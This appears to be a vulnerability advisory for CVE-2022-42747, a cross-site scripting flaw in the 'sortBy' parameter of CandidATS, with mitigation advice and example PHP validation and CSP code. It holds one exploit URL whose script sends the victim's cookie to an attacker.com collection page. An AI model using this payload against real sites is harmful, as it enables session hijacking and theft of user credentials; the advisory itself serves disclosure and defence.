A critical security vulnerability has been identified in CandidATS version 3... This vulnerability (CVE-2022-42747) allows an unauthenticated external attacker to steal the cookie of arbitrary users through the 'sortBy' field of the 'ajax.php' resource. The application does not properly validate user input against Cross-site Scripting (XSS) attacks, which allows attackers to execute arbitrary JavaScript code in the context of the user's browser.

Impact

The exploitation of this vulnerability could lead to the theft of sensitive user information, including session cookies or other authentication data. In a worst-case scenario, an attacker might use this vulnerability to hijack the session of a privileged user, such as an administrator, and gain complete control over the affected application.

Details

The vulnerability exists in the 'sortBy' parameter of the 'ajax.php' resource. By injecting a malicious payload into the sortBy field, an attacker can cause the affected page to execute JavaScript code within the user's browser.

The following request demonstrates how the vulnerability can be exploited:

http://example.com/candidats/ajax.php?m=office_data&a=sortColumns&sortBy=<script>document.location='http://attacker.com/cookie_stealer.php?cookie='+document.cookie;</script>&sortColumns=array()

In this example, the injected payload is a JavaScript code that makes a request to the attacking server with the user's cookie as a query string parameter. Once the attacker's server receives the cookie, they can use it to impersonate the victim in the CandidATS application.

Mitigation

To mitigate the risk associated with this vulnerability, users of CandidATS should immediately update their installation to the latest version. If the update is not feasible, administrators can implement the following workarounds:

1. Modify the 'ajax.php' file and apply proper input validation to the 'sortBy' parameter.

2. Use a Content Security Policy (CSP) header to restrict the execution of JavaScript code from untrusted sources.
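The two workarounds above, as an added example that is not CandidATS code: an allow-list check on the 'sortBy' parameter, output encoding for anything reflected back, and a restrictive CSP header. The column names and the placement inside ajax.php are assumed for illustration.

```php
<?php
// Added example, not CandidATS code. Demonstrates the two workarounds above:
// allow-list validation of the 'sortBy' parameter and a restrictive CSP header.
// The column names below are assumed for illustration, not taken from CandidATS.

// Columns the sort handler is actually allowed to order by (assumed names).
const ALLOWED_SORT_COLUMNS = ['firstName', 'lastName', 'dateModified', 'dateCreated'];

/**
 * Return the validated sort column, or null if the request value is not one
 * of the known columns. A non-string value (e.g. ?sortBy[]=x) and anything
 * containing markup such as a <script> payload are rejected before the value
 * can reach SQL or the rendered page.
 */
function validateSortBy($sortBy): ?string
{
    if (!is_string($sortBy)) {
        return null;
    }
    // Exact match against the allow-list; strict comparison avoids type juggling.
    return in_array($sortBy, ALLOWED_SORT_COLUMNS, true) ? $sortBy : null;
}

/**
 * Encode a value before reflecting it into HTML. Even after validation this is
 * cheap insurance if the value is ever echoed back to the browser.
 */
function escapeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Defence in depth: refuse inline scripts and scripts from other origins, so a
 * payload that slips through validation is not executed. Must be sent before
 * any output. Extend the 'self' sources if the app legitimately loads scripts
 * from elsewhere.
 */
function sendCspHeader(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
}

// Hypothetical placement inside the sort handler of ajax.php.
sendCspHeader();
$sortBy = validateSortBy($_GET['sortBy'] ?? null);
if ($sortBy === null) {
    http_response_code(400);
    echo 'Invalid sortBy parameter';
    exit;
}
// Safe to use $sortBy as a column name from here on.
echo 'Sorting by ' . escapeForHtml($sortBy);
```

The allow-list approach is preferable to filtering out dangerous characters, because a column name only ever needs to match one of a fixed set of known values.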

Additionally, users should be educated on the potential risks associated with clicking on suspicious links or opening unknown emails.

More information about CVE-2022-42747 can be found in the official CVE database:

- CVE-2022-42747

Conclusion

CVE-2022-42747 is a critical XSS vulnerability affecting CandidATS 3.., and its exploitation can lead to sensitive information disclosure and session hijacking. Users of this version are highly encouraged to apply the necessary updates or workarounds to prevent potential attacks.

It is essential for developers to carefully validate all user input and maintain good security practices in application development. By minimizing the risk of vulnerabilities such as this, users can enjoy a safe and secure application experience.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 01/26/2023 20:20:00 UTC